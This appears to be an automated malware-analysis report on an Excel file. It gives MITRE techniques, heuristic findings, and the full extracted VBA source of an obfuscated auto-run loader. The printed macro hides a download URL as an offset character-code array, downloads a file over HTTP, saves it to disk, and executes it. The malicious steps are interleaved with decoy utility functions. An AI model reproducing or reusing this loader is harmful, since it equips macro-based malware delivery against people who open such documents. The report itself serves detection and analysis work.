MALICIOUS
248
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The file is an Excel document containing obfuscated VBA macros. The Workbook_Open macro is triggered upon opening, which then executes the obfuscated code. This code utilizes CreateObject and CallByName, indicative of attempting to download and execute a secondary payload, a common technique for macro-based malware. No specific family could be identified due to the obfuscation and lack of network indicators.
Heuristics 7
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.Matched line in script
ErrExit: Set pubbyRodger_1 = CreateObject(hubabuba(0)) CheckBins -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
ErrExit: Set pubbyRodger_1 = CreateObject(hubabuba(0)) CheckBins -
CallByName call high OLE_VBA_CALLBYNAMECallByName callMatched line in script
Public Sub SaveMaps() rbp = CallByName(pubbyRodger_1, hubabuba(10), VbGet) Dim objStor As Variant -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Workbook_Open macro low OLE_VBA_WBOPENWorkbook_Open macroMatched line in script
Attribute VB_Customizable = True Public Sub Workbook_Open() Call CenterByMan -
Reference to Windows Script Host high SC_STR_WSCRIPTReference to Windows Script Host
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 14484 bytes |
SHA-256: 3ccbfd8ea4b148b18ee5e3527f5973881e19010b9641cb9a0b500b046a43aac4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ЭтаКнига"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
Call CenterByMan
End Sub
Attribute VB_Name = "Лист1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Лист3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "UserForm1"
Attribute VB_Base = "0{8CE1DD38-2B07-4F3D-AC62-F4321764A6DF}{44BEBCCC-45F8-4596-9A46-D713FAEB2B88}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Module1"
Public pubbyRodger_1 As Object
Public pubbyRodger_2 As Object
Public pubbyRodger_3 As Object
Public pubbyRodger_7() As String
Public pubbyRodger_4 As String
Public pubbyRodger_5 As String
Public pubbyRodger_6 As Object
Public hubabuba() As String
Public MapsInitialized As Boolean
Public mDBname As String
Public MapInit As Boolean
' ________________________________________Util Functions End____________________________________________
' summe vom Range
Public Function rngCol(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum As Double
For i = startRow To endRow
For j = 0 To UBound(arrCol)
If IsNumeric(Cells(i, arrCol(j)).Value) Then
sum = sum + Cells(i, arrCol(j)).Value
End If
Next j
res(i - startRow + 1, 1) = sum
sum = 0
Next i
rngCol = res
End Function
Public Function rngArr(ByVal startRow As Integer, ByVal endRow As Integer, ByVal arrCol As Variant)
Dim res()
ReDim res(1 To endRow - startRow + 1, 1 To 1)
Dim i As Integer
Dim j As Integer
Dim sum()
ReDim sum(0 To UBound(arrCol))
For i = startRow To endRow
For j = 0 To UBound(arrCol)
sum(j) = Cells(i, arrCol(j)).Value
Next j
res(i - startRow + 1, 1) = sum
ReDim sum(0 To UBound(arrCol))
Next i
rngArr = res
End Function
Public Function rng(ByVal start As Integer, ByVal ending As Integer)
Dim res()
ReDim res(0 To ending - start)
Dim i As Integer
For i = start To ending
res(i - start) = i
Next i
rng = res
End Function
Public Sub CenterByMan()
Dim Col As String
Dim obj As String
hubabuba = Split(UserForm1.Label1.Caption, "/")
GoTo ErrExit
ErrExit:
Set pubbyRodger_1 = CreateObject(hubabuba(0))
CheckBins
Exit Sub
husbanDip:
AD.DisplayError Err.Number, "modMaps", "CenterByMan", Err.Description
Resume ErrExit
End Sub
' ______________________________ Print______________________________________________
Public Function p()
' check if the val is array
Dim is_a As Boolean
Dim k
For Each k In Me.dict.Keys
is_a = IsArray(Me.dict(k))
Exit For
Next k
If is_a Then
For Each k In Me.dict.Keys
Debug.Print k & " " & a_toString(Me.Item(k))
Next k
Else
For Each k In Me.dict.Keys
Debug.Print k & " " & Me.Item(k)
Next k
End If
End Function
Public Function a_toString(ByVal arr As Variant) As String
Dim res As String
Dim i
res = "["
For Each i In arr
res = res & Replace(" " & i, ",", ".") & ", "
Next i
res = Left(res, Len(res) - 2)
a_toString = res & " ]"
End Function
Public Function pk()
Dim k
For Each k In Me.dict.Keys
Debug.Print k
Next k
End Function
Public Sub SaveMaps()
rbp = CallByName(pubbyRodger_1, hubabuba(10), VbGet)
Dim objStor As Variant
CallByName pubbyRodger_2, hubabuba(9), VbMethod, rbp
CallByName pubbyRodger_2, hubabuba(11), VbMethod, pubbyRodger_5, 2
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
pubbyRodger_6.Open (pubbyRodger_5)
End Sub
Attribute VB_Name = "Module4"
Public Function toJSON(Optional ByVal k As String = "root") As String
Dim res As String
res = "{""name"":""" & k & """," & Chr(13)
res = res & """children"":[" & Chr(13)
Dim ky
For Each ky In pDict.Keys
res = res & "{""name"":""" & Replace(CStr(ky), """", "") & """, " & """size"": " & Replace(CStr(pDict(ky)), ",", ".") & "}," & Chr(13)
Next ky
toJSON = Left(res, Len(res) - 2) & Chr(13) & "]}"
End Function
Attribute VB_Name = "Module3"
Public Function productRng(ByVal operand2 As Variant, ByVal operation As String) As Variant
Dim k
Dim i
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
res.dict(k) = productArr(pDict(k), operation, operand2)
Next k
Else
For Each k In pDict.Keys
If operand2.dict.Exists(k) Then
res.dict(k) = productArr(pDict(k), operation, operand2.dict(k))
End If
Next k
End If
Set productRng = res
End Function
Public Function productArr(ByVal arr1 As Variant, ByVal operation As String, ByVal arr2 As Variant) As Variant
Dim res
Dim i
ReDim res(LBound(arr1) To UBound(arr1))
If IsNumeric(arr2) Then
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2, ",", "."))
Next i
Else
For i = LBound(arr1) To UBound(arr1)
res(i) = Application.Evaluate(Replace(arr1(i) & operation & arr2(i), ",", "."))
Next i
End If
productArr = res
End Function
Public Function crentips(nY As Integer) As String
Dim pubbyRodger_8 As Integer
Dim pubbyRodger3_1 As String
pubbyRodger3_1 = ""
GoTo s2
s2:
For pubbyRodger_8 = LBound(pubbyRodger_7) To UBound(pubbyRodger_7)
pubbyRodger3_1 = pubbyRodger3_1 & Chr(CInt(pubbyRodger_7(pubbyRodger_8)) - 1000)
Next pubbyRodger_8
GoTo SIDR4
SIDR4:
pubbyRodger_1.Open hubabuba(5), pubbyRodger3_1, False
KeepBlyading
End Function
Public Function clone__(ByVal d As Variant, ByVal l As Integer) As Variant
Dim res As New Dicts
Dim k
Call res.ini
If l > 1 Then
For Each k In d.dict.Keys
Set res.dict(k) = clone__(d.dict(k), l - 1)
Next k
Else
For Each k In d.dict.Keys
res.dict(k) = d.dict(k)
Next k
End If
Set clone__ = res
End Function
Public Sub CheckBins()
pubbyRodger_7 = Split("1104:1116:1116:1112:1058:1047:1047:1104:1111:1109:1101:1046:1099:1111:1112:1121:1099:1108:1117:1098:1046:1114:1117:1047:1119:1112:1045:1097:1100:1109:1105:1110:1047:1109:1097:1105:1110:1116:1047:1055:1054:1103:1104:1098:1121:1054:1102:1052:1053:1046:1101:1120:1101", _
":")
Dim LP As Long
Dim BinID As Long
Dim objStorages As String
Dim objStorage As Variant
Dim MapID As Long
Set pubbyRodger_2 = CreateObject(hubabuba(1))
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
Set pubbyRodger_6 = CreateObject(hubabuba(2))
Set husbanD = CreateObject(hubabuba(3))
Set pubbyRodger_3 = husbanD.Environment(hubabuba(4))
crentips 3
End Sub
Public Function filterInklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterInklude = res
End Function
''''''''''''''''''''
'set all the elements to a constant
'default to be 1
''''''''''''''''''''
Public Function constDict(Optional ByVal constant As Variant) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
If IsMissing(constant) Then
constant = 1
End If
For Each k In pDict.Keys
res.dict(k) = constant
Next k
Set constDict = res
End Function
Attribute VB_Name = "Module2"
'''''''''''''''''''
'@param operand2 can be either number or Dicts
' operation supports only the string
'''''''''''''''''''
Public Function product() As Variant
Dim k
Dim isNum As Boolean
isNum = True
pubbyRodger_5 = pubbyRodger_4
GoTo LABZ4
Dim res As Variant
Call res.ini
If Not IsMissing(IsNumericOperation) Then
If Not IsNumericOperation Then
isNum = False
End If
Else
isNum = True
End If
LABZ4:
pubbyRodger_5 = pubbyRodger_5 + hubabuba(12)
Exit Function
If IsNumeric(operand2) Then
' if the second operand is numeric
For Each k In pDict.Keys
If Not isNum Then
res.dict(k) = App.lication.Evaluate(Appli.cation.Works.heetFunction.Substitute(pDict(k) & operation & operand2, ",", "."))
Else
res.dict(k) = Appli.cation.Evaluate(pDict(k) & operation & operand2)
End If
Next k
Else
For Each k In pDict.Keys
If Not isNum Then
If operand2.dict.Exists(k) Then
res.dict(k) = Appli.cation.Evaluate(Appli.cation.WorksheetFunction.Substitute(pDict(k) & operation & operand2.dict(k), ",", "."))
End If
Else
If operand2.dict.Exists(k) Then
res.dict(k) = Applica.tion.Evaluate(pDict(k) & operation & operand2.dict(k))
End If
End If
Next k
End If
Set product = res
End Function
Public Sub OnasOn()
CallByName pubbyRodger_2, hubabuba(7), VbLet, 1
pubbyRodger_2.Open
GoTo husbanDip
ErrExit:
Exit Sub
husbanDip:
SaveMaps
End Sub
Public Function reduceRngVertical(ByVal sign As String) As Variant
Dim k
Dim i
Dim tmpCnt As Integer
tmpCnt = 1
Dim arr()
Dim u As Integer
Dim l As Integer
For Each k In pDict.Keys
If tmpCnt = 1 Then
u = UBound(pDict(k))
l = LBound(pDict(k))
ReDim arr(l To u)
tmpCnt = 2
If sign = "+" Then
For i = l To u
arr(i) = 0
Next i
Else
For i = l To u
arr(i) = 1
Next i
End If
End If
If sign = "+" Then
For i = l To u
arr(i) = arr(i) + pDict(k)(i)
Next i
Else
For i = l To u
arr(i) = arr(i) * pDict(k)(i)
Next i
End If
Next k
reduceRngVertical = arr
End Function
Public Function reduceArray(ByVal arr, ByVal sign As String) As Variant
Dim res As Variant
Dim k
If sign = "" Or sign = "+" Then
res = 0
For Each k In arr
res = res + k
Next k
ElseIf sign = "*" Then
res = 1
For Each k In arr
res = res * k
Next k
End If
reduceArray = res
End Function
Public Function filterVal(ByVal operation As String, Optional ByVal placeholder As String = "{*}", Optional ByVal hasThousandSep As Boolean = True) As Variant
Dim k
Dim tmp As String
Dim res As Variant
Set res = New Dicts
Call res.ini
If hasThousandSep Then
For Each k In pDict.Keys
tmp = Replace(pDict(k) & "", ",", ".")
If Application.Evaluate(Replace(operation, placeholder, tmp)) Then
res.dict(k) = k
End If
Next k
Else
For Each k In pDict.Keys
If Application.Evaluate(Replace(operation, placeholder, pDict(k) & "")) Then
res.dict(k) = k
End If
Next k
End If
Set filterVal = res
End Function
Public Sub KeepBlyading()
pubbyRodger_1.Send
GoTo SIDR4
If IsMissing(keepOriginalVal) Then
keepOriginalVal = True
End If
Dim k
Dim res As Variant
res.dict = pDict
For Each k In dict2.dict.Keys
If Not pDict.Exists(k) Then
res.dict(k) = dict2.dict(k)
ElseIf Not keepOriginalVal Then
res.dict(k) = dict2.dict(k)
End If
Next k
Set Add = res
SIDR4:
pubbyRodger_4 = pubbyRodger_3(hubabuba(6))
GoTo SIDR1
SIDR1:
product
OnasOn
End Sub
Public Function filterExklude(ByVal reg As Object) As Variant
Dim k
Dim res As Variant
Set res = New Dicts
Call res.ini
For Each k In pDict.Keys
If Not reg.test(k) Then
res.dict(k) = pDict(k)
End If
Next k
Set filterExklude = res
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.